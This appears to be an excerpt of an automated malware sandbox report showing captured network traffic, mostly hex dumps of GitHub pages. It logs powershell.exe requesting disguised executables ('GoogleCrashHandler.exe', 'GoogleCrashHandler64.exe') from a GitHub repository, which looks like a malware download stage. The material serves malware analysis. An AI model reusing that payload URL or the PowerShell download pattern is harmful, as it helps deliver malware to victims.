                                                                                              2022-08-10 04:47:09 UTC141INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 27 22 60 20 2d 2d 3e 3c 21 2d 2d 20 3c 2f 74 65 78 74 61 72 65 61 3e 3c 2f 78 6d 70 3e 20 2d 2d 3e 3c 2f 6f 70 74 69 6f 6e 3e 3c 2f 66 6f 72 6d 3e 3c 66 6f 72 6d 20 64 61 74 61 2d 74 75 72 62 6f 3d 22 66 61 6c 73 65 22 20 61 63 74 69 6f 6e 3d 22 2f 73 65 73 73 69 6f 6e 22 20 61 63 63 65 70 74 2d 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 6d 65 74 68 6f 64 3d 22 70 6f 73 74 22 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 75 74 68 65 6e 74 69 63 69 74 79 5f 74 6f 6b 65 6e 22 20 76 61 6c 75 65 3d 22 77 52 61 55 6d 6a 4c 4d 70 73 77 47 68 4e 41 70 61 54 59 65 71 4b 64 39 4c 4e 54 49 2d 4c 79 49 72 77 6f 34 4e 62 71 4e 50 63 79 54 66 34 74 44 61 56 70 51 53 50 48
                                                                                              Data Ascii: ... '"` -->... </textarea></xmp> --></option></form><form data-turbo="false" action="/session" accept-charset="UTF-8" method="post"><input type="hidden" name="authenticity_token" value="wRaUmjLMpswGhNApaTYeqKd9LNTI-LyIrwo4NbqNPcyTf4tDaVpQSPH
                                                                                              2022-08-10 04:47:09 UTC142INData Raw: 72 6f 6c 22 20 2f 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 63 6c 69 65 6e 74 5f 69 64 22 20 69 64 3d 22 63 6c 69 65 6e 74 5f 69 64 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 22 20 2f 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 69 6e 74 65 67 72 61 74 69 6f 6e 22 20 69 64 3d 22 69 6e 74 65 67 72 61 74 69 6f 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 22 20 2f 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 6e 61 6d 65 3d 22 72 65 71 75 69 72 65 64 5f 66 69 65 6c 64 5f 37 30 65 32 22 20 68 69 64 64 65
                                                                                              Data Ascii: rol" /><input type="hidden" name="client_id" id="client_id" autocomplete="off" class="form-control" /><input type="hidden" name="integration" id="integration" autocomplete="off" class="form-control" /><input type="text" name="required_field_70e2" hidde
                                                                                              2022-08-10 04:47:09 UTC143INData Raw: 63 61 74 69 6f 6e 5f 69 6e 5f 70 61 67 65 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 73 69 74 65 20 68 65 61 64 65 72 20 6d 65 6e 75 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 72 65 70 6f 73 69 74 6f 72 79 5f 69 64 26 71 75 6f 74 3b 3a 6e 75 6c 6c 2c 26 71 75 6f 74 3b 61 75 74 68 5f 74 79 70 65 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 53 49 47 4e 5f 55 50 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6f 72 69 67 69 6e 61 74 69 6e 67 5f 75 72 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 67 6f 77 67 65 72 72 69 65 2f 72 65 62 6f 72 6e 2f 72 61 77 2f 6d 61 69 6e 2f 30 34 2f 47 6f 6f 67 6c 65 43 72 61 73 68 48 61 6e 64 6c 65 72 2e 65 78 65 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 75 73 65 72 5f 69 64 26 71 75 6f 74 3b 3a 6e
                                                                                              Data Ascii: cation_in_page&quot;:&quot;site header menu&quot;,&quot;repository_id&quot;:null,&quot;auth_type&quot;:&quot;SIGN_UP&quot;,&quot;originating_url&quot;:&quot;https://github.com/gowgerrie/reborn/raw/main/04/GoogleCrashHandler.exe&quot;,&quot;user_id&quot;:n
                                                                                              2022-08-10 04:47:09 UTC144INData Raw: 46 35 43 0d 0a 7d 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 78 2d 32 22 20 3e 0a 20 20 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 66 6c 61 73 68 2d 63 6c 6f 73 65 20 6a 73 2d 66 6c 61 73 68 2d 63 6c 6f 73 65 22 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 44 69 73 6d 69 73 73 20 74 68 69 73 20 6d 65 73 73 61 67 65 22 3e 0a 20 20 20 20 20 20 3c 73 76 67 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 31 36 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e
                                                                                              Data Ascii: F5C}"> <div class="px-2" > <button class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon
                                                                                              2022-08-10 04:47:09 UTC145INData Raw: 67 65 2f 6a 70 65 67 3b 62 61 73 65 36 34 2c 2f 39 6a 2f 34 41 41 51 53 6b 5a 4a 52 67 41 42 41 67 41 41 5a 41 42 6b 41 41 44 2f 37 41 41 52 52 48 56 6a 61 33 6b 41 41 51 41 45 41 41 41 41 55 41 41 41 2f 2b 34 41 44 6b 46 6b 62 32 4a 6c 41 47 54 41 41 41 41 41 41 66 2f 62 41 49 51 41 41 67 49 43 41 67 49 43 41 67 49 43 41 67 4d 43 41 67 49 44 42 41 4d 43 41 67 4d 45 42 51 51 45 42 41 51 45 42 51 59 46 42 51 55 46 42 51 55 47 42 67 63 48 43 41 63 48 42 67 6b 4a 43 67 6f 4a 43 51 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 45 44 41 77 4d 46 42 41 55 4a 42 67 59 4a 44 51 73 4a 43 77 30 50 44 67 34 4f 44 67 38 50 44 41 77 4d 44 41 77 50 44 77 77 4d 44 41 77 4d 44 41 38 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d
                                                                                              Data Ascii: ge/jpeg;base64,/9j/4AAQSkZJRgABAgAAZABkAAD/7AARRHVja3kAAQAEAAAAUAAA/+4ADkFkb2JlAGTAAAAAAf/bAIQAAgICAgICAgICAgMCAgIDBAMCAgMEBQQEBAQEBQYFBQUFBQUGBgcHCAcHBgkJCgoJCQwMDAwMDAwMDAwMDAwMDAEDAwMFBAUJBgYJDQsJCw0PDg4ODg8PDAwMDAwPDwwMDAwMDA8MDAwMDAwMDAwMDAwMDAwMDAwM
                                                                                              2022-08-10 04:47:09 UTC147INData Raw: 52 77 4f 79 73 4b 32 42 51 35 57 77 52 47 77 55 61 62 42 56 47 77 51 48 42 42 73 46 46 62 42 56 47 77 4b 69 74 68 77 67 47 48 43 44 59 63 4a 6c 63 5a 44 36 5a 32 51 6f 2f 54 51 2f 33 42 67 68 57 2b 6d 56 4b 42 39 4d 6f 56 76 70 70 52 73 43 67 47 50 43 69 74 6a 77 67 32 49 51 44 45 49 42 67 45 55 4d 41 68 7a 68 67 69 6c 77 4b 47 41 78 37 4b 51 6f 59 38 49 42 6a 77 67 47 43 41 59 46 5a 57 77 4d 43 69 30 75 42 52 43 6d 78 43 67 62 46 46 4c 67 50 78 51 4c 39 4d 62 4b 4b 47 48 43 42 63 4f 47 36 4b 52 51 4e 71 51 35 69 47 78 46 4c 67 6d 54 42 54 61 70 46 49 62 55 55 70 73 34 51 4c 68 77 6d 63 4c 6a 4a 44 61 52 6f 70 41 70 73 65 61 49 74 4c 39 4e 51 49 62 44 71 6f 70 44 59 4f 36 42 66 70 68 54 4b 34 49 62 4f 50 42 52 55 38 57 68 75 36 42 63 5a 68 52 53 34 74 32
                                                                                              Data Ascii: RwOysK2BQ5WwRGwUabBVGwQHBBsFFbBVGwKithwgGHCDYcJlcZD6Z2Qo/TQ/3BghW+mVKB9MoVvppRsCgGPCitjwg2IQDEIBgEUMAhzhgilwKGAx7KQoY8IBjwgGCAYFZWwMCi0uBRCmxCgbFFLgPxQL9MbKKGHCBcOG6KRQNqQ5iGxFLgmTBTapFIbUUps4QLhwmcLjJDaRopApseaItL9NQIbDqopDYO6BfphTK4IbOPBRU8Whu6BcZhRS4t2
                                                                                              2022-08-10 04:47:09 UTC148INData Raw: 38 30 30 30 0d 0a 78 47 79 54 49 47 41 51 62 42 49 59 44 41 4a 41 4d 42 73 6d 54 41 59 63 4b 52 61 33 30 2b 45 4b 48 30 79 69 35 44 36 64 79 44 59 4a 7a 6e 4d 47 41 31 55 55 4d 41 69 55 44 36 59 55 71 68 39 50 68 41 75 48 43 4b 47 4b 67 42 74 52 53 34 38 49 6b 4b 62 51 70 79 71 42 73 37 70 56 4b 62 4f 43 67 55 32 48 5a 41 75 48 48 64 46 44 41 72 4b 30 70 39 4e 41 68 73 52 53 6d 79 73 4b 42 54 36 59 32 55 71 35 77 51 2b 6e 77 6f 70 44 5a 77 67 58 48 63 4b 4b 51 32 49 45 4e 71 4b 55 32 68 52 55 7a 5a 77 55 43 47 77 37 49 45 4e 6d 72 4c 4b 34 49 62 45 71 70 6d 77 71 4c 53 6d 31 53 4c 53 47 7a 78 32 55 79 71 57 43 41 47 30 4b 46 54 4e 6f 32 30 52 61 6d 62 57 52 51 59 66 65 6f 52 35 59 41 48 44 4c 74 4b 35 55 77 43 31 47 56 42 61 33 78 51 70 77 46 57 61 6f 4c
                                                                                              Data Ascii: 8000xGyTIGAQbBIYDAJAMBsmTAYcKRa30+EKH0yi5D6dyDYJznMGA1UUMAiUD6YUqh9PhAuHCKGKgBtRS48IkKbQpyqBs7pVKbOCgU2HZAuHHdFDArK0p9NAhsRSmysKBT6Y2Uq5wQ+nwopDZwgXHcKKQ2IENqKU2hRUzZwUCGw7IENmrLK4IbEqpmwqLSm1SLSGzx2UyqWCAG0KFTNo20RambWRQYfeoR5YAHDLtK5UwC1GVBa3xQpwFWaoL
                                                                                              2022-08-10 04:47:09 UTC149INData Raw: 71 43 7a 52 6b 53 34 4f 4c 46 55 71 6f 73 51 55 46 69 75 44 4b 67 73 54 43 5a 79 6f 4c 4f 46 55 4f 4c 4f 45 4b 63 57 44 5a 58 42 6b 34 74 34 56 6a 4a 78 59 67 63 57 67 61 49 55 34 74 47 79 49 59 57 75 68 6e 42 78 5a 77 71 68 78 59 67 59 57 38 4f 67 59 57 6e 5a 41 32 42 32 56 54 34 6e 48 70 37 70 55 48 42 43 6d 77 51 4d 4c 43 71 55 52 36 61 4a 54 44 30 77 67 59 57 44 5a 55 77 4f 49 32 55 67 5a 69 6b 42 78 4b 73 42 77 4b 49 62 42 46 48 42 51 4d 4c 65 46 59 6c 62 44 68 4d 47 63 6d 77 4f 79 66 45 2b 41 34 46 43 6a 67 68 79 6a 67 6c 42 77 51 6a 59 49 44 68 77 68 42 78 34 56 42 77 34 43 44 59 71 4b 4f 4a 51 62 42 45 77 4f 4b 4b 32 42 51 6f 34 46 43 74 67 64 6b 4b 4f 42 32 51 72 59 4b 46 48 42 43 68 39 4e 55 6f 2f 54 55 4b 33 30 79 6c 41 77 51 48 44 68 42 73 43
                                                                                              Data Ascii: qCzRkS4OLFUqosQUFiuDKgsTCZyoLOFUOLOEKcWDZXBk4t4VjJxYgcWgaIU4tGyIYWuhnBxZwqhxYgYW8OgYWnZA2B2VT4nHp7pUHBCmwQMLCqUR6aJTD0wgYWDZUwOI2UgZikBxKsBwKIbBFHBQMLeFYlbDhMGcmwOyfE+A4FCjghyjglBwQjYIDhwhBx4VBw4CDYqKOJQbBEwOKK2BQo4FCtgdkKOB2QrYKFHBCh9NUo/TUK30ylAwQHDhBsC
                                                                                              2022-08-10 04:47:09 UTC151INData Raw: 5a 34 56 68 57 77 36 49 56 6a 36 61 46 62 42 49 55 4d 41 6f 72 59 42 56 47 77 34 43 41 59 6e 5a 52 57 59 68 45 5a 6c 4d 59 58 49 4d 68 47 59 4a 42 73 65 45 57 74 67 2b 6e 69 6f 42 39 50 68 44 47 51 50 70 2b 4f 69 4b 48 30 79 6f 74 4b 62 4e 79 67 47 43 44 59 68 51 67 59 44 5a 41 44 59 4e 6b 41 77 51 4b 62 4e 6c 47 69 59 6f 41 79 41 59 68 51 4c 68 77 71 46 77 4f 79 6a 52 54 5a 77 6f 70 54 59 64 55 51 75 43 4b 55 2b 6d 73 71 6d 66 54 56 6f 55 32 37 71 4b 51 32 42 51 71 5a 73 34 55 79 75 4d 6b 4e 71 69 6b 4e 76 43 47 4d 70 47 31 46 49 62 58 53 43 5a 73 4b 69 70 47 33 68 52 55 7a 61 70 46 54 4e 68 46 46 46 53 4e 6e 48 5a 51 54 75 73 65 56 4f 5a 65 64 49 32 36 49 75 45 7a 5a 43 4c 68 50 46 53 4c 58 6a 69 33 52 64 33 6e 56 46 76 5a 57 43 67 74 32 56 78 68 4d 71
                                                                                              Data Ascii: Z4VhWw6IVj6aFbBIUMAorYBVGw4CAYnZRWYhEZlMYXIMhGYJBseEWtg+nioB9PhDGQPp+OiKH0yotKbNygGCDYhQgYDZADYNkAwQKbNlGiYoAyAYhQLhwqFwOyjRTZwopTYdUQuCKU+msqmfTVoU27qKQ2BQqZs4UyuMkNqikNvCGMpG1FIbXSCZsKipG3hRUzapFTNhFFFSNnHZQTuseVOZedI26IuEzZCLhPFSLXji3Rd3nVFvZWCgt2VxhMq
                                                                                              2022-08-10 04:47:09 UTC152INData Raw: 6f 71 4c 47 30 52 44 69 77 6c 55 71 6c 76 70 71 6c 55 46 69 4a 61 59 57 6f 68 78 59 6f 70 78 59 46 55 4e 69 4e 67 69 47 41 56 68 54 43 30 37 49 55 34 73 51 4d 4c 65 45 51 32 50 43 41 73 69 77 63 56 55 68 73 56 51 77 73 34 68 51 48 44 68 58 6d 54 6e 4e 67 66 38 41 43 67 59 57 48 67 49 44 67 64 30 51 63 45 55 63 41 6b 42 46 6f 30 64 57 41 34 63 49 47 46 6e 43 41 69 31 45 6a 43 33 65 55 55 63 52 43 45 48 48 68 41 57 51 62 45 37 4b 56 52 78 4f 79 72 49 34 6c 53 71 32 4b 55 48 46 4b 4e 68 34 70 53 6a 69 4e 6c 4b 44 69 4e 6b 6f 32 41 32 54 42 6b 63 65 41 67 4f 4a 36 49 4e 69 6f 4e 69 71 4e 6a 79 67 32 4b 41 34 6c 4d 6d 47 78 4b 6c 56 73 53 6c 42 78 50 41 52 4b 32 42 34 53 6a 59 38 71 56 57 78 37 70 52 73 45 35 54 6b 48 44 68 55 72 59 67 61 4b 4c 7a 68 69 4e 6b
                                                                                              Data Ascii: oqLG0RDiwlUqlvpqlUFiJaYWohxYopxYFUNiNgiGAVhTC07IU4sQMLeEQ2PCAsiwcVUhsVQws4hQHDhXmTnNgf8ACgYWHgIDgd0QcEUcAkBFo0dWA4cIGFnCAi1EjC3eUUcRCEHHhAWQbE7KVRxOyrI4lSq2KUHFKNh4pSjiNlKDiNko2A2TBkceAgOJ6INioNiqNjyg2KA4lMmGxKlVsSlBxPARK2B4SjY8qVWx7pRsE5TkHDhUrYgaKLzhiNk
                                                                                              2022-08-10 04:47:09 UTC153INData Raw: 4b 31 41 4e 68 32 55 56 6d 62 52 57 70 47 5a 52 57 59 4b 51 42 6b 47 49 44 6f 59 77 32 49 56 41 78 35 55 55 47 4b 71 4d 33 43 45 42 6b 55 4d 65 36 55 41 32 2b 43 69 34 4c 6a 79 68 41 78 4f 33 64 41 47 4b 69 74 69 69 42 68 39 7a 71 4c 6e 4a 54 62 32 53 68 54 59 69 2f 37 69 34 71 4c 51 78 43 49 58 41 4b 4b 51 32 4b 42 54 59 69 6b 4e 71 45 4b 62 56 42 4d 32 70 56 69 5a 74 52 63 45 4e 71 67 6d 62 4e 6b 61 77 6b 62 57 55 69 31 4d 32 71 43 4e 31 71 4b 6b 62 56 46 52 75 74 55 68 55 72 72 56 46 52 75 74 52 55 62 72 56 46 71 57 4d 71 4e 50 49 74 74 6f 75 7a 67 75 4c 52 73 72 68 46 37 62 64 57 57 73 59 5a 79 73 4c 65 45 46 72 62 59 52 4d 72 57 32 71 34 52 61 32 31 56 46 52 61 72 68 4d 71 69 30 37 4b 6b 55 46 6e 43 43 77 73 33 43 76 49 79 63 57 6e 6f 67 70 62 36 5a
                                                                                              Data Ascii: K1ANh2UVmbRWpGZRWYKQBkGIDoYw2IVAx5UUGKqM3CEBkUMe6UA2+Ci4LjyhAxO3dAGKitiiBh9zqLnJTb2ShTYi/7i4qLQxCIXAKKQ2KBTYikNqEKbVBM2pViZtRcENqgmbNkawkbWUi1M2qCN1qKkbVFRutUhUrrVFRutRUbrVFqWMqNPIttouzguLRsrhF7bdWWsYZysLeEFrbYRMrW2q4Ra21VFRarhMqi07KkUFnCCws3CvIycWnogpb6Z
                                                                                              2022-08-10 04:47:09 UTC155INData Raw: 4c 49 6b 46 6b 42 77 4f 79 41 34 46 41 63 41 68 7a 43 4c 52 73 68 7a 44 6a 39 36 69 69 79 71 4d 79 55 46 75 45 47 5a 42 6d 52 59 4c 56 53 49 7a 64 30 47 59 4b 6a 4d 6b 47 38 74 6c 46 62 68 41 56 52 70 51 5a 43 4d 79 44 4d 70 67 79 7a 62 53 68 42 5a 4b 52 6d 38 45 56 6d 61 71 56 4f 64 6d 38 45 47 62 56 54 6d 57 30 57 47 71 74 52 6d 2f 42 52 57 62 68 4b 43 78 32 56 52 6d 55 49 33 64 46 5a 43 43 68 47 52 49 7a 49 72 4d 70 42 75 69 6f 33 56 51 5a 41 4b 61 4b 4b 79 6f 4b 49 45 61 71 4b 7a 42 56 41 4e 76 4c 4b 4b 42 42 51 42 6a 39 71 71 4d 67 43 69 35 5a 6b 4b 44 56 51 42 55 5a 52 51 5a 39 45 41 62 5a 43 41 31 58 51 42 49 41 79 6b 47 49 48 5a 41 47 31 43 74 51 70 47 36 42 53 4b 73 69 34 79 42 74 37 49 45 4e 72 66 63 70 46 6f 49 46 4e 71 67 51 69 76 47 69 4c 53
                                                                                              Data Ascii: LIkFkBwOyA4FAcAhzCLRshzDj96iiyqMyUFuEGZBmRYLVSIzd0GYKjMkG8tlFbhAVRpQZCMyDMpgyzbShBZKRm8EVmaqVOdm8EGbVTmW0WGqtRm/BRWbhKCx2VRmUI3dFZCChGRIzIrMpBuio3VQZAKaKKyoKIEaqKzBVANvLKKBBQBj9qqMgCi5ZkKDVQBUZRQZ9EAbZCA1XQBIAykGIHZAG1CtQpG6BSKsi4yBt7IENrfcpFoIFNqgQivGiLS
                                                                                              2022-08-10 04:47:09 UTC156INData Raw: 33 7a 37 50 70 31 65 46 53 33 2b 6c 66 37 34 54 64 6e 2b 75 2f 51 57 67 4e 53 37 31 62 6e 66 2f 73 77 70 71 2f 63 50 67 66 68 73 39 70 30 61 66 46 6c 64 50 32 46 78 76 78 31 37 50 70 31 65 46 54 2b 31 58 37 79 42 2f 36 68 2b 69 50 51 2b 70 2f 6d 4c 50 75 48 77 65 37 32 6e 64 36 32 73 2f 59 50 47 62 7a 52 33 75 6f 77 2f 70 58 2b 37 76 38 41 4e 2b 34 2f 6f 37 52 6f 52 39 51 76 2f 77 43 77 46 4d 2f 75 4a 77 6e 77 32 57 76 75 39 61 34 2b 77 65 4c 2b 4f 30 30 64 37 71 56 2f 74 54 2b 35 6d 6e 37 6e 2b 6d 69 76 79 33 2b 39 6d 57 50 63 54 68 74 31 72 36 63 4e 65 33 2f 45 37 33 52 30 5a 45 66 30 70 2f 63 69 51 2f 37 70 2b 6d 41 4a 71 4c 62 79 5a 55 7a 2b 34 6e 44 62 72 58 30 34 58 48 32 42 78 47 39 30 39 47 56 68 2f 53 6a 39 58 54 2f 66 48 6f 2f 39 31 64 2f 6e 4c
                                                                                              Data Ascii: 3z7Pp1eFS3+lf74Tdn+u/QWgNS71bnf/swpq/cPgfhs9p0afFldP2Fxvx17Pp1eFT+1X7yB/6h+iPQ+p/mLPuHwe72nd62s/YPGbzR3uow/pX+7v8AN+4/o7RoR9Qv/wCwFM/uJwnw2Wvu9a4+weL+O00d7qV/tT+5mn7n+mivy3+9mWPcTht1r6cNe3/E73R0ZEf0p/ciQ/7p+mAJqLbyZUz+4nDbrX04XH2BxG909GVh/Sj9XT/fHo/91d/nL
                                                                                              2022-08-10 04:47:09 UTC157INData Raw: 50 68 45 66 30 74 2f 59 43 78 2f 32 76 39 77 44 30 2b 66 30 76 39 55 6e 75 46 78 2f 79 62 4c 6f 31 65 4d 39 42 63 44 38 2b 30 36 64 50 68 62 2b 31 2f 38 41 4c 37 46 76 31 66 37 69 66 2b 30 39 4c 2f 56 4a 37 68 63 66 38 6d 79 36 4e 58 6a 50 51 58 41 2f 50 74 4f 6e 54 34 53 2f 32 75 2f 59 57 50 38 41 34 7a 39 66 30 50 71 65 6c 2f 71 6b 39 77 65 50 2b 54 5a 39 47 72 78 6e 6f 50 67 66 6e 32 6e 54 70 38 4a 76 37 58 2f 79 2b 78 50 2b 31 2f 75 4d 66 39 5a 36 58 2b 71 54 33 42 34 2f 35 4e 6c 30 61 76 47 76 6f 50 67 66 6e 32 6e 54 70 38 4c 66 32 76 38 41 35 66 38 41 2f 77 44 4c 2f 63 48 6e 48 2f 53 65 6c 70 2f 32 53 65 34 50 48 2f 4a 73 75 6a 56 34 7a 30 48 77 50 7a 37 54 70 30 2b 45 6c 33 39 4c 76 32 4e 68 6a 2b 75 2f 58 57 6c 70 65 2f 30 69 39 4b 66 36 4d 4c 57
                                                                                              Data Ascii: PhEf0t/YCx/2v9wD0+f0v9UnuFx/ybLo1eM9BcD8+06dPhb+1/8AL7Fv1f7if+09L/VJ7hcf8my6NXjPQXA/PtOnT4S/2u/YWP8A4z9f0Pqel/qk9weP+TZ9GrxnoPgfn2nTp8Jv7X/y+xP+1/uMf9Z6X+qT3B4/5Nl0avGvoPgfn2nTp8Lf2v8A5f8A/wDL/cHnH/Selp/2Se4PH/JsujV4z0HwPz7Tp0+El39Lv2Nhj+u/XWlpe/0i9Kf6MLW
                                                                                              2022-08-10 04:47:09 UTC159INData Raw: 2f 61 33 39 35 64 68 2b 76 2f 41 45 51 30 72 36 6e 2b 59 6e 75 46 77 65 37 32 6e 64 36 7a 30 48 78 65 38 30 64 37 71 53 75 2f 70 68 2b 2f 42 32 2f 57 66 6f 43 42 2f 6c 2b 71 44 2f 38 41 53 35 57 38 66 75 44 77 48 78 30 62 54 6f 30 2b 4a 7a 7a 39 69 63 62 6a 6d 31 37 50 70 31 65 45 44 2f 53 2f 39 2f 46 70 50 2b 30 2f 74 35 4f 74 6f 39 54 31 58 2f 38 41 70 4b 34 2f 63 48 79 2f 50 35 4e 70 30 61 66 45 6d 66 73 54 6a 76 6e 32 66 54 71 38 4b 58 39 73 66 35 68 4c 2f 77 43 6c 2f 52 51 66 2f 69 33 2f 41 4f 72 58 54 31 39 35 64 2f 70 74 4f 6a 48 69 5a 39 44 63 66 2f 72 6f 36 63 39 53 56 2f 38 41 54 58 2b 59 37 61 48 39 4a 65 42 55 32 2b 71 59 38 62 51 74 61 66 76 7a 79 37 50 7a 34 2f 6c 2f 69 78 71 2b 79 50 4d 4d 66 4a 6e 2f 41 50 66 34 46 50 38 41 54 66 38 41 6d
                                                                                              Data Ascii: /a395dh+v/AEQ0r6n+YnuFwe72nd6z0Hxe80d7qSu/ph+/B2/WfoCB/l+qD/8AS5W8fuDwHx0bTo0+Jzz9icbjm17Pp1eED/S/9/FpP+0/t5Oto9T1X/8ApK4/cHy/P5Np0afEmfsTjvn2fTq8KX9sf5hL/wCl/RQf/i3/AOrXT195d/ptOjHiZ9Dcf/ro6c9SV/8ATX+Y7aH9JeBU2+qY8bQtafvzy7Pz4/l/ixq+yPMMfJn/APf4FP8ATf8Am
                                                                                              2022-08-10 04:47:09 UTC160INData Raw: 4b 67 4d 52 58 37 46 41 34 74 4a 66 68 77 37 6f 48 74 46 4f 36 6d 51 7a 4f 48 45 67 31 4b 4b 59 57 73 51 47 67 31 36 6f 68 73 58 49 4e 78 49 5a 2f 50 6b 49 4b 4d 42 41 6b 6e 54 32 43 67 41 74 59 66 34 68 41 59 51 77 31 56 6f 63 41 67 4d 30 37 6a 6e 77 55 55 57 4e 77 49 33 69 56 42 6d 49 67 48 78 30 37 4b 6b 47 53 43 52 72 78 35 36 49 43 41 62 74 47 47 67 4d 6f 70 6d 63 41 38 51 53 67 47 46 7a 43 6b 53 4f 71 41 75 78 64 36 6a 57 50 61 71 41 73 51 4e 52 51 63 7a 71 67 4f 4a 4f 37 51 34 4d 66 65 67 62 46 71 42 78 78 34 6f 41 52 70 49 42 31 6f 7a 66 67 67 59 57 38 6b 6d 65 69 44 4f 54 49 70 71 5a 46 61 55 51 62 67 43 42 54 7a 51 59 33 55 41 4c 79 42 34 70 45 45 6b 36 73 34 6c 68 76 38 45 55 43 51 48 59 73 64 48 6f 67 49 6f 41 38 78 32 38 55 41 44 67 38 62 78
                                                                                              Data Ascii: KgMRX7FA4tJfhw7oHtFO6mQzOHEg1KKYWsQGg16ohsXINxIZ/PkIKMBAknT2CgAtYf4hAYQw1VocAgM07jnwUUWNwI3iVBmIgHx07KkGSCRrx56ICAbtGGgMopmcA8QSgGFzCkSOqAuxd6jWPaqAsQNRQczqgOJO7Q4MfegbFqBxx4oARpIB1ozfggYW8kmeiDOTIpqZFaUQbgCBTzQY3UALyB4pEEk6s4lhv8EUCQHYsdHogIoA8x28UADg8bx


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              2192.168.11.2049807140.82.121.4443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2022-08-10 04:47:36 UTC161OUTGET /gowgerrie/reborn/raw/main/04/GoogleCrashHandler64.exe HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                              Host: github.com
                                                                                              Connection: Keep-Alive
                                                                                              2022-08-10 04:47:36 UTC162INHTTP/1.1 404 Not Found
                                                                                              Server: GitHub.com
                                                                                              Date: Wed, 10 Aug 2022 04:47:36 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                              permissions-policy: interest-cohort=()
                                                                                              Cache-Control: no-cache
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                              X-Frame-Options: deny
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 0
                                                                                              Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                                                                                              Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                              2022-08-10 04:47:36 UTC162INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                              Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.
